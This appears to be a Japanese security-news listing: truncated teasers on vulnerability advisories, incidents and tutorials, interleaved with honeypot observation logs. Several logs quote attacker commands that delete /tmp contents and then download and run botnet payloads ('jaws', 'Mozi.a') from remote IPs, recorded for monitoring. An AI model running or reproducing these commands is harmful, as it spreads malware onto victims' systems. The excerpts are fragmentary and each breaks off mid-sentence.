ハニーポット(仮) 観測記録 2023/03/27分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP aiohttpによるスキャン行為 .jsへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 WordPress Pluginへのスキャン行為 phpMyAdminへのスキャン行為 UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 45.81.243.34/jaws; sh /tmp/jaws Location:US D-link製品の脆弱性を狙うアクセス Drupalの脆弱性(CVE-2018-7600)を狙
ハニーポット(仮) 観測記録 2023/03/26分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP D-link製品の脆弱性を狙うアクセス Nmap Scripting Engineによるスキャン行為 webprosbotによるスキャン行為 .jsへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 WordPress Pluginへのスキャン行為 phpMyAdminへのスキャン行為 Gh0stRATのような動き UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 45.81.243.34/jaws; sh /tmp/jaws cd /tmp; rm -
Microsoft、BingとOffice 365を攻撃できる可能性のあるAzure ADの脆弱性を修正 米Microsoftは3月29日(現地時間)、Azure Active Directoryを使用するマルチテナントアプリケーションの認証の構成ミスに対処したと発表した。この問題は、米Wiz Researchのアナリストが1月31日に報告したもの。 Wizによると、同社が「BingBang」と名付けたこの構成ミスを悪用すると、誰でもBing.comの検索結果をリアルタイムで変更したり、クロスサイトスクリプティング(XSS)攻撃でOffice 365のユーザーアカウントを侵害したりできた可能性があるという。Wizは、パッチが適用される前に脆弱性が悪用された証拠はないとしている。 WizはMicrosoftによる修正を確認した後、BingBangについての解説ブログを公開した。 Wizは、A
Microsoftの検索エンジンBingから、検索結果を変更したり、Teams、Outlook、Microsoft 365などから他のBingユーザーの個人情報にアクセスしたりできる危険な脆弱(ぜいじゃく)性が発見されました。脆弱性はすでに修正されていますが、メールやドキュメントの内容が公開される可能性が指摘されています。 BingBang: AAD misconfiguration led to Bing.com results manipulation and account takeover | Wiz Blog https://www.wiz.io/blog/azure-active-directory-bing-misconfiguration Guidance on Potential Misconfiguration of Authorization of Multi-Ten
米サイバーセキュリティインフラストラクチャセキュリティ庁(CISA)は、10件の脆弱性について積極的な悪用が確認されているとし、注意を呼びかけている。 「悪用が確認された脆弱性カタログ(KEV)」へ2013年以降に明らかとなった脆弱性10件を追加し、注意喚起を行ったもの。収録された脆弱性は積極的に悪用されており、関連する製品を利用している組織では警戒する必要がある。 2023年に入ってから明らかとなった脆弱性は、Linuxカーネルの「ALSA PCM」パッケージに明らかとなった「Use After Free」の脆弱性「CVE-2023-0266」のみ。他脆弱性は2022年以前に公表されたものとなる。 5件については、2022年に判明した脆弱性。ブラウザ「Chrome」に明らかとなった「CVE-2022-3038」をはじめ、「Cobalt Strike」における「CVE-2022-42948
Apple Watchはいつまで使える?watchOSアップデートや修理受付終了は? 2023 3/30 Appleは、世界開発者会議(WWDC23)において、最新のwatchOS 10を発表しました。 最新OSが発表されたことで、Apple Watchを利用している方の中には、「私のApple Watchはサポート対象となるのか」「いつまで使えるのか」と気になる方も多いのではないでしょうか。 本記事では、watchOSのアップデートや修理サポートの観点から「Apple Watchがいつまで使えるのか」を考察します。 ■3行で分かる、この記事のポイント 1. watchOS 10はApple Watch Series 4以降のモデルをサポート 2. watchOSアップデートから考えると、6年程度使える可能性が高い 3. 修理サポートから考えると、製造終了後5年程度使える可能性が高い wa
iPadシリーズは、カラーバリエーションの増加や機能アップなど、モデルチェンジのたびに大きな話題を集め、その魅力を増しています。 しかし、比較的高価であることから、機種変更のタイミングが難しく「自分のiPadがいつまで使えるのか」と気になっている方も多いのではないでしょうか。 本記事では、iPadがいつまで使えるのか、iPadOSのアップデートや修理サポートの観点から考察します。 ■3行で分かる、この記事のポイント 1. iPadOSアップデートから考えると、6年〜8年程度使える可能性が高い 2. 修理サポートの点で考えるとiPadは製造終了後5年間使える可能性が高い 3. セキュリティアップデートから考えると、iPadOSサポート終了後も当面の間使える可能性が高い iPad各モデルのiPadOSアップデートが終了するのはいつ? 例年、新型iPhoneの発売と同時期に行われるのがiPadO
ハニーポット(仮) 観測記録 2023/03/22分です。 特徴 共通 Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス GPONルータの脆弱性を狙うアクセス Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 Apache Tomcatへのスキャン行為 Location:JP NetGear製品の脆弱性を狙うアクセス /.gitへのスキャン行為 phpMyAdminへのスキャン行為 を確認しました。 Location:US NetGear製品の脆弱性を狙うアクセス PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス /.gitへのスキャン行為 を確認しました。 Location:UK D-link製品の脆
2022年10月末にサイバー攻撃を受けたことで話題になった大阪急性期・総合医療センターが3月28日に、同件の調査報告書を公開した。調査によると、同センターではユーザー全てに管理者権限を付与していた他、数あるサーバやPCなどで共通のIDとパスワードを使用しており、侵入経路となったVPN機器は脆弱性が放置されているなどずさんな管理体制だったことが分かった。 問題が発生したのは22年10月31日。電子カルテシステムを稼働させていた基幹システムサーバがランサムウェアで暗号化され診療を制限することになった。完全復旧したのは23年1月11日。被害額は調査と復旧で数億円。診療制限で十数億円に及ぶという。 攻撃者は同センターが患者給食業務を委託している業者経由でシステムに侵入したとみられる。給食事業者に設置されていたVPN機器は脆弱性が放置されていたため、侵入経路になったという。 攻撃者は給食事業社のシス
Appleが日本時間2023年3月28日早朝にリリースした、iOS16.4/iPadOS16.4、macOS Ventura 13.3においては、30を超える脆弱性が修正されていることがわかりました。 日本語のAppleセキュリティアップデートページは近く更新の見込み Appleの「Appleセキュリティアップデート」の日本語ページは本稿執筆時点ではまだ更新されていませんが、近く更新されると思われます。 Appleセキュリティアップデートの日本語ページ アプリがユーザーのアドレス帳やデータにアクセスできる脆弱性が修正 Appleセキュリティアップデートの英語ページによれば、たとえばAccessibilityで「サードパーティーのアプリがユーザーのアドレス帳の情報にアクセスできてしまう」脆弱性が、iOS16.4/iPadOS16.4で修正されています。 その他にもAppleMobileFil
コンピュータ情報サイトの「Bleeping Computer」は2023年3月25日(現地時間)、「Windows 11」のスクリーンショットキャプチャーツール「Snipping Tool」および「Windows 10」の「Snip&Sketch」の脆弱(ぜいじゃく)性、通称「acropalypse」について、Microsoftが緊急のセキュリティアップデートを提供したと伝えた。 acropalypseは、編集前の画像データの一部が削除されずにそのまま残っているという脆弱性で、「CVE-2023-28303 - Security Update Guide - Microsoft - Windows Snipping Tool Information Disclosure Vulnerability」として追跡されている。 深刻度は共通脆弱性評価システム(CVSS)で3.3と評価されておりス
Apache Tomcat 11.0.0-M1から11.0.0-M2までのバージョン Apache Tomcat 10.1.0-M1から10.1.5までのバージョン Apache Tomcat 9.0.0-M1から9.0.71までのバージョン Apache Tomcat 8.5.0から8.5.85までのバージョン Apache Tomcatには、httpsが設定されたX-Forwarded-Protoヘッダを含むリクエストをHTTP経由でリバースプロキシから受信し、RemoteIpFilterを使用している場合において、Apache Tomcatが作成するセッションCookieにSecure属性が含まれない問題(CVE-2023-28708)が存在します。このため、ユーザエージェントが安全でないチャネルでセッションCookieを送信する可能性があります。
スリーシェイク、東京コンピュータサービスと自動脆弱性診断ツール「Securify Scan」の販売代理店契約を締結 SREおよびセキュリティのプロフェッショナル集団である、株式会社スリーシェイク(本社:東京都新宿区、代表取締役社長:吉田 拓真、以下スリーシェイク)は、東京コンピュータサービス株式会社(本社:東京都中央区、代表取締役社長:髙山 芳之、以下東京コンピュータサービス)と、手軽に社内でセキュリティ診断を実施できる自動脆弱性診断ツール「Securify Scan(セキュリファイ スキャン)」において、販売代理店契約を締結したことをお知らせします。 ■背景 近年、目まぐるしく変わるビジネス要件に対して、クイックな開発、高頻度のリリースが必要不可欠となり、開発手法でもウォーターフォール型からアジャイル開発へと、より効率的でスピードを重視したかたちへとシフトしています。しかし、開発の速度と
印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます 日本シノプシスは3月14日、「2023年 オープンソース・セキュリティ&リスク分析(Open Source Security and Risk Analysis:OSSRA)レポート」に関する説明会を開催した。Synopsysの研究機関Cybersecurity Research Center(CyRC)が、企業の合併・買収(M&A)に際して棚卸しした1703のソフトウェアを対象に匿名化したデータを分析している。 Synopsysのリスク診断を実施した1480のコード中、既知の脆弱性を1つ以上含んでいた割合は84%(昨年比4%上昇)、4年以上前のコードを含む割合は89%(昨年比4%上昇)だった。 日本シノプシス ソフトウェア・インテグリ
Fortinetは、FortiOSにパストラバーサルの脆弱性が存在するとし、公開の数日後にその脆弱性が政府機関などを標的としたサイバー攻撃に悪用されていたことを伝えた。
モバイルバッテリーとは呼べない。「ほぼポタ電」なコレ1台で有事の時もアウトドアも大活躍!【AmazonスマイルSALE】
ハニーポット(仮) 観測記録 2023/03/07分です。 特徴 共通 Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス GPONルータの脆弱性を狙うアクセス CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP /.gitへのスキャン行為 UserAgentがHello, Worldであるアクセス UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 100.43.163.61/jaws; sh /tmp/jaws cd /tmp; rm -rf *; wget 103.215.81.11/jaws; chmod /tmp/jaws; sh /tmp/
Windows 11に標準搭載されているスクリーンショット撮影・編集機能であるSnipping Toolに、編集前のデータを復元できる脆弱(ぜいじゃく)性が存在することが報告されました。これは、Google製スマートフォン・Pixelシリーズのスクリーンショット編集機能に見つかった脆弱性「aCropalypse(CVE-2023-21036)」と非常によく似ていると指摘されています。 holy FUCK. Windows Snipping Tool is vulnerable to Acropalypse too. An entirely unrelated codebase. The same exploit script works with minor changes (the pixel format is RGBA not RGB) Tested myself on Window
【要注意】Windows 10/11のSnipping Toolに削除したはずの情報が残っている脆弱性が存在 2023 3/22 Windows 10/11に搭載されているMicrosoft公式アプリ「Snipping Tool」に、削除したはずの情報が残っている可能性がある脆弱性が存在する事がわかりました(Neowin)。 この脆弱性は、Google PixelのスクリーンショットツールMarkupで同様の問題を最初に発見した、リバースエンジニアリング研究者のDavid Buchanan氏によって発見されたものです。 holy FUCK. Windows Snipping Tool is vulnerable to Acropalypse too. An entirely unrelated codebase. The same exploit script works with min
サイバーセキュリティ対策ソリューションやDX支援・デジタルアドバイザリー事業を手がける株式会社ビヨンドブルー(本社:神奈川県横浜市、代表取締役:木村 光秀 以下ビヨンドブルー)は攻撃面とされやすい外部接続しているデバイス(ファイヤーウォール、VPN接続機器、外部DNS,メールサーバ、コーポレートサーバ)向けの低価格ペネトレーションテストの提供を開始しましたのでお知らせ致します。 サイバーセキュリティ対策ソリューションやDX支援、情報システム部門向けBPOサービス「情シスのミカタ」(https://mikata.beyondblue.tokyo)を手がける株式会社ビヨンドブルー(本社:神奈川県横浜市、代表取締役:木村 光秀 以下ビヨンドブルー)はペネトレーションテストサービスを展開するグローバル企業のレイ・イージス・ジャパン株式会社(本社:東京都新宿区、代表取締役 青木 登)と連携し、これま
Innovative Tech: このコーナーでは、テクノロジーの最新研究を紹介するWebメディア「Seamless」を主宰する山下裕毅氏が執筆。新規性の高い科学論文を山下氏がピックアップし、解説する。Twitter: @shiropen2 中国のShanghai Fudan Microelectと復旦大学に所属する研究者らが発表した論文「Access Your Tesla without Your Awareness: Compromising Keyless Entry System of Model 3」は、Tesla Model 3のキーカードとフォンキーの脆弱性を利用し、ドアのロック解除から運転までを可能にした研究報告である。 テスラは、モデル3、モデルX、モデルY、モデルSにおいて、フォンキー、キーカード、キーフォブの3種類のキーをサポートしている。キーカードの場合、車に対して
Microsoftは2023年3月16日(現地時間)、「Windows」のストレージ暗号化技術「BitLocker」に存在するセキュリティ機能回避の脆弱(ぜいじゃく)性(CVE-2022-41099)に関連するPowerShellスクリプトを公開した。 CVE-2022-41099を修正するための更新プログラム自体は2023年1月に配信されていたが、このプログラムはホストのWindowsプラットフォームだけでなく、「Windows回復環境」(WinRE:Windows Recovery Environment)にも手動で適用する必要があった。今回のPowerShellスクリプトはこの処理を自動化するものだ。
ハニーポット(仮) 観測記録 2023/03/13分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス CensysInspectによるスキャン行為 /.envへのスキャン行為 Location:JP Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス masscanによるスキャン行為 を確認しました。 Location:US D-link製品の脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス Nmap Scripting Engineによるスキャン行為 .jsへのスキャン行為 UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget update.rawup
概要 3月のセキュリティアップデート「Patch Tuesday」において、Outlookの新たなセキュリティ脆弱性が実際に悪用されていることが明らかになりました。これは、NTLMハッシュの流出によりドメインを侵害する可能性がある深刻な脆弱性です。今回の悪用は、CVE-2017-8572や CVE-2017-11927など、2017年にさかのぼる関連脆弱性の最新版にすぎず、攻撃者はOutlookからユーザーのNTLMv2認証情報を漏洩させることができました。これらの認証情報を利用して、攻撃者はネットワーク上のWindowsホストとの認証時に被害者になりすますことができ、被害者のユーザー権限に応じて重要なサーバーへの自由なアクセスを許可する可能性があります。 この脆弱性の仕組み CVE-2023-23397は、攻撃者がOutlookからNTLMv2ハッシュを漏洩させることができる脆弱性です。
ハニーポット(仮) 観測記録 2023/03/12分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス /.envへのスキャン行為 /.gitへのスキャン行為 Location:JP Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス D-link製品の脆弱性を狙うアクセス UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 193.42.32.175/jaws; sh /tmp/jaws cd /tmp; rm -rf *; wget 128.199.134.42/jaws; sh /tmp/jaws cd /tmp; rm -rf *; wget 5.255.105.240/jaws; sh /tmp/jaws cd
Microsoftが、Windows 11およびWindows 10で報告されていたBitLockerバイパスのセキュリティ問題を修正するためのPowerShellスクリプトを公開しています。 Microsoftは、CVE-2022-41099のセキュリティ脆弱性に対処するために、デバイスのWindows回復環境(WinRE)の更新を自動化するために役立つサンプルPowerShellスクリプトを2つ提供しています。 どちらのスクリプトを使用するかは実行中のWindowsのバージョンによって異なります。 1つ目のスクリプト(推奨)はより堅牢で、Windows 10 Version 2004以降、およびWindows 11向けとなっています。2番目のスクリプトは、主にWindows 10 Version 1909以前のデバイス向けですが、これもWindows 11とWindows 10のすべて
ハニーポット(仮) 観測記録 2023/03/11分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス CensysInspectによるスキャン行為 masscanによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス Spring Bootの脆弱性を狙うアクセス webprosbotによるスキャン行為 .jsへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 UserAgentがHello, Worldであるアクセス UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 128.199.134.42/j
sponsored G-Master Luminous RGB Z790 IIをレビュー 「光ってればゲーミングPC」という風潮に断固NO! 究極のライトアップPCを紹介しよう sponsored 映画も音楽もゲームも最高の体験でした 5万円で買える超迫力サウンドの"攻めたタブレット"<Lenovo Tab Plus>実機レビュー sponsored ビデオカードなしで「FFXIV: 黄金のレガシー」の60fps超えが狙える!? 「AMD Ryzen 5 8600G」の実力を見た! sponsored 白いPCに合うのはLED付きメモリーだけじゃない! 純白のメモリーもいいぞ sponsored JN-245GT180FHDRをレビュー 180Hz駆動の液晶が1万9800円ってマジ!? PS5と組み合わせてもコスパ◎な格安モデルの実力は? sponsored 今話題のオープンイヤーオーディ
アマゾン ウェブ サービス(以下、AWS)が 2023年3月15日から一般提供を開始する「Amazon Linux 2023」 (以下、AL2023) の、国内唯一となるローンチパートナーとして認定されたことをお知らせします。 これにより、AL2023の提供開始直後からyamoryによるスキャンが可能となります。また、AWSサービスレディプログラムの一つであるAmazon Linux Ready認定も取得しました。yamoryは、Amazon Linux上でサポートされたソフトウェアとして安心してご利用いただけます。 AL2023ローンチパートナーおよびAmazon Linux Ready認定サービスとしてAWSと緊密に連携し、AWSサービスにおける脆弱性対策をお客様に提供することで、安心してテクノロジーを活用できる世界を実現し、社会のDX加速を支えるべく、サービス向上に努めてまいります。
株式会社コンテックが提供するCONPROSYS IoT ゲートウェイ製品には、複数の脆弱性が存在します。 M2M Gateway(5機種) CPS-MG341-ADSC1-111 Ver.3.7.10およびそれ以前 CPS-MG341-ADSC1-931 Ver.3.7.10およびそれ以前 CPS-MG341G-ADSC1-111 Ver.3.7.10およびそれ以前 CPS-MG341G-ADSC1-930 Ver.3.7.10およびそれ以前 CPS-MG341G5-ADSC1-931 Ver.3.7.10およびそれ以前 M2Mコントローラ コンパクトタイプ(9機種) CPS-MC341-ADSC1-111 Ver.3.7.6およびそれ以前 CPS-MC341-ADSC1-931 Ver.3.7.6およびそれ以前 CPS-MC341-ADSC2-111 Ver.3.7.6およびそれ以前 C
Azure Client Server Run-time Subsystem(CSRSS) Internet Control Message Protocol(ICMP) Microsoft Bluetooth Driver Microsoft Dynamics Microsoft Edge(Chromium-based) Microsoft Graphics Component Microsoft Office Excel Microsoft Office Outlook Microsoft Office SharePoint Microsoft OneDrive Microsoft PostScript Printer Driver Microsoft Printer Drivers Microsoft Windows Codecs Library Office for Android
昨今、新サービスの開発や大幅な生産性向上などの事業環境の変化に合わせて多くの業務を、外部に委託する企業が増えており、委託先・取引先の脆弱性を突いたサイバー攻撃も増加しています。今や委託先・取引先企業のセキュリティ統制が経営課題なっていますが、その一方で、これらへの対応はリソース上難しい、どのように運用すればよいかわからない、というセキュリティ担当者様も多いのではないでしょうか。 そこで本記事では 最近の委託先・取引先を狙ったセキュリティ被害事例 「セキュリティ実態調査2022」からみる日本企業のセキュリティ動向 サイバーセキュリティ経営ガイドラインの改訂方針 ⇒サイバーセキュリティ経営ガイドライン Ver3.0の公開(2023/3/27更新) という3点を踏まえて、委託先や取引先のセキュリティ管理について企業が抱える実態を整理しつつ、今後どのように企業がサプライチェーンの統制を図るべきか解
ハニーポット(仮) 観測記録 2023/03/10分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス zgrabによるスキャン行為 /.envへのスキャン行為 /.gitへのスキャン行為 Location:JP .jsへのスキャン行為 /.awsへのスキャン行為 Gh0stRATのような動き UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 128.199.134.42/jaws; sh /tmp/jaws cd /tmp; rm -rf *; wget 94.158.247.123/jaws; sh /tmp/jaws Location:US Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス CensysIn
JSAC2023の講演の様子を引き続きお伝えします。第3回はDAY2 Workshopについてです。 Surviving the hurt locker: or How I Learned to Stop Worrying and Love the Bom講演者:LINE株式会社 Simon Vestin、二関 学Simon氏、二関氏は、SBOMの説明およびSBOMを生成するプログラムを作成するハンズオンを行いました。SBOMとは、ソフトウェアやシステムを構成材料を列挙したものです。SBOMは、コンプライアンス・ライセンス管理や脆弱性管理に使用されており、複数の規格やタイプがあることを紹介いただきました。また、SBOMの作成方法として、モデリングを手動で行う方法やツールで自動化する方法を共有いただきました。 DIY CycloneDX/cyclonedx-python-lib https:
解説を担当した、日本シノプシス合同会社のシニア・セキュリティ・エンジニア 吉井雅人氏 OSSRAレポートは、企業および団体のセキュリティ、法務、リスク管理、開発部門がオープンソースに潜むセキュリティやライセンス上のリスクの全体像をより良く把握できるようにすることを目的としたもの。商用ソフトウェアに組み込まれたオープンソースのセキュリティ、コンプライアンス、ライセンス、コード品質のリスクの現状とその分析がまとめられている。 2023年版では、2022年に収集された1700を超えるコードベースから、17種の業界におけるオープンソース・ソフトウェア利用のトレンドが明らかとなっている。 コードベースの84%に脆弱性、特にJavaScriptライブラリに注意 まず、コードベースの84%に1つ以上の既知の脆弱性が含まれていることが明らかとなった。これは、昨年の調査結果から約4%の増加となる。また、検出
Autodesk FBX SDK バージョン2020およびそれ以前 上記Autodesk FBX SDKを利用する以下の製品も本脆弱性の影響を受けます。 Luxion KeyShot バージョン11.3およびそれ以前 Autodesk社が提供するFBX SDKには、次の複数の脆弱性が存在します。 境界外読み取り (CWE-125) - CVE-2022-41302 解放済みメモリの使用 (CWE-416) - CVE-2022-41303 境界外書き込み (CWE-787) - CVE-2022-41304 脆弱性を悪用された場合、ローカルの第三者によって細工されたFBXファイルを介して、次のような影響を受ける可能性があります。 現プロセスのコンテキストでコードを実行される - CVE-2022-41302 システム上で任意のコードを実行される - CVE-2022-41303 コードを実
This blog post is older than a year. The information provided below may be outdated. 2023 年 3 月 14 日 (米国時間) 、マイクロソフトは、マイクロソフト製品に影響する脆弱性を修正するために、セキュリティ更新プログラムを公開しました。影響を受ける製品をご利用のお客様は、できるだけ早期に、公開されたセキュリティ更新プログラムを適用してください。なお、マイクロソフト製品では、一部の例外を除き既定で自動更新が有効になっており、自動的にセキュリティ更新プログラムが適用されます。最新の情報は、セキュリティ更新プログラム ガイド を確認してください。 なお、今月の「悪意のあるソフトウェアの削除ツール」では、このツールで削除できる悪意のあるソフトウェアが追加されています。詳細は、対象のマルウェアファミリ を参
はじめに はじめまして、DP部新人のもたもたです。 今でこそフレームワークの充実やOS側の防御が充実し、あまり見ることがなくなった感のあるバッファオーバーフロー脆弱性ですが、たまに見つかってしまうとRCEの可能性のある危険なものであることに変わりはありません。 そんなバッファオーバーフローにはバッファの大きさ、位置、OS側の防御策などによってさまざまなテクニックが存在しています。 今回はあえてレガシーなものを調べてみたくなったので、その内のひとつ、egghunterというテクニックについて解説していきたいと思います。 準備 まずバッファオーバーフローが発生するコードを用意していきます。 vulnserverなど、既にあるものを使うのもいいのですが、今回はバッファオーバーフローの包括的な勉強を兼ねたかったこともあって簡単なコードを自分で作成しました。 Winsock サーバー コードの完了
Proofpointのセキュリティ製品「Proofpoint Enterprise Protection」に複数の脆弱性が明らかとなった。パッチが提供されている。 同製品のウェブユーティリティにおいて認証されたユーザーにより、リモートからコードを実行されるおそれがある「CVE-2023-0089」が判明したもの。 また特定の設定下においてウェブサービスAPIよりリモートで認証なしにコードの実行が可能となる「CVE-2023-0090」が明らかとなった。いずれも「同8.20.0」および以前のバージョンが影響を受ける。 共通脆弱性評価システム「CVSSv3.1」のベーススコアはそれぞれ「8.8」「8.1」、重要度はいずれも「高(High)」とレーティングされている。 同社は、脆弱性を修正した「同8.20.0 patch 4570」「同8.19.0 patch 4581」「同8.18.6 pat
はじめに こんにちは。セキュリティエンジニアの@okazu_dmです。 皆さんはブラウザにおいてLocal StorageやCookieに格納されている値が暗号化されているかどうかを考えたことはあるでしょうか。これらWebサービスの認証・認可において使われるデータが、XSSのようなアプリケーションの脆弱性への耐性に差があるかどうかは頻繁に議論されるところです。 しかし、ブラウザに保存されたデータが暗号化されているかどうかはまた別の攻撃経路への耐性の話であり、馴染みがないのではないでしょうか。 これは、基礎知識としてLocal StorageとCookieの仕組み/挙動の紹介と比較をしつつ、Google Chromeにおけるそれらの暗号化の実装上の違いを検証する記事です。 なお、保存先のストレージとAuth0のアクセストークンのXSS耐性との関連は過去に別の記事で検証しています。興味がある方
ドキシング(Doxing)の語源は、個人情報などが含まれるファイルを意味する「文書(Documents)」の略語「Docs」の綴りに由来する造語だ。特定のユーザーに関する情報を粘着質に収集し、その集めた情報をインターネット上に公開することで、対象のユーザーに対して「恥ずかしい」、「悲しい」、「恐ろしい」といった心理的、あるいは金銭的な悪影響を及ぼすことを目的とする。 日本のインターネット掲示板などでも以前から「晒し」と呼ばれる、住所・携帯電話番号・顔写真など個人を特定する情報を本人に無断で掲示板上に投稿する行為が存在する。こうした対象ユーザーの感知しないところでの行為によって、被害を与えようとする側面を踏まえると、一種のいじめに近いとも言える。 ドキシングの問題点はその行為自体だけでなく、以降の行為が進展していくことでより大きくなっていくことだ。例えば、インターネット上での行為がやがて現実
HPは同社が提供する特定のプリンタに情報漏えいの可能性がある脆弱(ぜいじゃく)性が存在すると発表した。この脆弱性は「CVE-2023-1707」として特定されており、深刻度は「緊急」(Critical)だ。 IPsecを有効にしたFutureSmart 5.6を使用している場合に影響を受けるとされ、問題を解決するアップデートはまだ提供されていない。HPは対策として一時的にファームウェアのバージョンを戻すことを推奨しており、90日以内に問題の修正を実施するとしている。 脆弱性の影響を受けるとされる製品は以下の通りだ。 HP Color LaserJet Enterprise M455 HP Color LaserJet Enterprise MFP M480 HP Color LaserJet Managed E45028 HP Color LaserJet Managed MFP E475
BitLockerでディスクを暗号化する設定と解除方法 PCの紛失や盗難などによって大事なデータが盗まれてしまう可能性がある。大事なデータが保存されているディスクは、暗号化して、万一盗難などにあってもデータが漏えいしないようにしよう。それには、Windows 11標準の暗号化ツール「BitLocker」を使ってドライブを暗号化するとよい。その設定方法と解除方法を紹介する。 ノートPCを持ち歩いて使っていると不安なのが、紛失や盗難などによって大事なデータが盗まれてしまう可能性があることだ。いくら生体認証などを使ってサインイン時のセキュリティを堅牢(けんろう)にしていても、USBメモリから起動することで、内蔵ディスクから簡単にデータを抜き出すことができてしまうからだ。 こうした万一の状況からデータを守る方法として、Windows OS標準(Homeを除く)の暗号化機能「BitLocker」を使
Akuvoxが提供するE11はビデオドアフォンです。E11には、次の複数の脆弱性が存在します。 CBC モードにおけるランダムな初期化ベクトルの不使用 (CWE-329) - CVE-2023-0343 ハードコードされた暗号鍵の使用 (CWE-321) - CVE-2023-0355 重要な機能に対する認証の欠如 (CWE-306) - CVE-2023-0354 復元可能な形式でのパスワード保存 (CWE-257) - CVE-2023-0353 脆弱なパスワードリカバリ (CWE-640) - CVE-2023-0352 コードインジェクション (CWE-94) - CVE-2023-0351 外部から提供されたファイルのファイル名や拡張子への依存 (CWE-646) - CVE-2023-0350 権限チェックの欠如 (CWE-862) - CVE-2023-0349 不適切なアク
はじめに こんにちは。研究開発部 入社2年目の北村です。 最近、社内で利用しているMicrosoft 365のセキュリティ関連の業務を扱うことが多くなり、日々精進しています('◇')ゞ さっそくですが先日、MDVM(Microsoft Defender Vulnerability Management)のadd-onが2023.3.1にGA(一般公開)になったので使ってみました! 本稿では、MDVMと追加されたadd-onについて紹介をしたいと思います。 この追加機能はDefender for Endpoint プラン2およびMicrosoft 365 E5 ライセンスをお持ちの方であれば、add-on($2.00 ユーザ/月)として契約することで利用できます。 はじめに MDVM(Microsoft Defender Vulnerability Management)とは? 有料の脆弱性
Googleは3月9日(現地時間)、デスクトップ版Chromeブラウザの最新版「Chrome 111」をリリースしました(Chrome Releases、Chrome Developers)。 Chrome 111.0.5563.64(Linux/Mac)、111.0.5563.64/.65(Windows)では深刻度Highの脆弱性8件を含む合計40件の脆弱性が修正されています。セキュリティ関連の修正の詳細はChromium Security Pageで確認可能です。 Chrome 111では、シングルページアプリで、洗練されたトランジションを実現するView Transitions APIが導入されています。Web上でスムーズなトランジションを作成すためには複雑な作業が必要ですが、View Transitions APIでは、ビューをスナップショットし、状態間の重複なくDOMを変化させ
セキュリティオペレーション統括部 JSOCの賀川です。 システム開発や、環境構築、サービス提供に向けたプロジェクトなど、様々なシーンでクラウドプラットフォームを用いるのが当たり前になってきました。そこで気になるのが「プロジェクトの開始時点で、セキュリティ対策をしっかりと考慮できているかどうか」です。 ラックは2022年9月に「AIクラウドセキュリティ運用支援サービス」を発表※しました。2023年3月、このサービスに新たな機能を追加し、サービス内容を拡充しています。ここでは、その内容を踏まえながら、クラウドネイティブ機能とAIを組み合わせた最新のセキュリティ対策を紹介します。 ※ ラック、組織で利用するクラウド環境をサイバー侵害から守る「AIクラウドセキュリティ運用支援サービス」を提供 クラウドプラットフォームが抱える難しさ クラウドプラットフォームは手軽でスピーディに環境を準備し、システム
ハニーポット(仮) 観測記録 2023/03/03分です。 特徴 共通 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP .jsへのスキャン行為 /.gitへのスキャン行為 UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget http://27.41.18.203:50703/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws Location:US Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス Atlassian Jira Server/Data Centerの脆弱性(CVE-2021-26086)を狙うアクセス D-link製品の脆弱性を狙うアクセス
Fortinet製品に複数の脆弱性が明らかとなった。「FortiOS」や「FortiProxy」では、重要度が「クリティカル(Critical)」とされる脆弱性「CVE-2023-25610」が判明している。 同社は現地時間3月7日にセキュリティアドバイザリ15件をリリースし、利用者に注意喚起を行った。脆弱性の重要度を見ると、5段階中もっとも高い「クリティカル(Critical)」とされる脆弱性は1件。2番目に高い「高(High)」とされる脆弱性が5件、続く「中(Medium)」が8件、「低(Low)」が1件となっている。 「クリティカル」とされる脆弱性は、「FortiOS」および「FortiProxy」が影響を受けるバッファアンダーフローの脆弱性「CVE-2023-25610」。管理画面インタフェースに対して細工したリクエストを送信されると、認証なしにコードを実行されたり、サービス拒否に
